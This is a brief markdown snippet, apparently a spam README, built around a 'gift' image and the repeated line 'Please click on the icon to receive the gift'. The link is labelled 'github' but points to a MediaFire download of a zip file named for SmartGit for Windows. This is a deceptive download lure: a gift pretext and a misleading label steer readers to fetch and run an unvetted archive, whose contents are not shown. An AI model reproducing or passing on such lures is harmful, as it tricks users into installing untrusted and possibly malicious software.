### Please click on the icon to receive the gift.
|[<b>Give for you</b>][github]|
|         :---:         |
|[![github-img]][github]|

[github]: http://download1348.mediafire.com/55ifdimca7wg/9cp6ao8x7pbw0rg/smartgit-win-18_2_1.zip "Please click on the icon to receive the gift"
[github-img]: https://phongvu.vn/landing/wp-content/uploads/2018/06/gift.gif "Please click on the icon to receive the gift"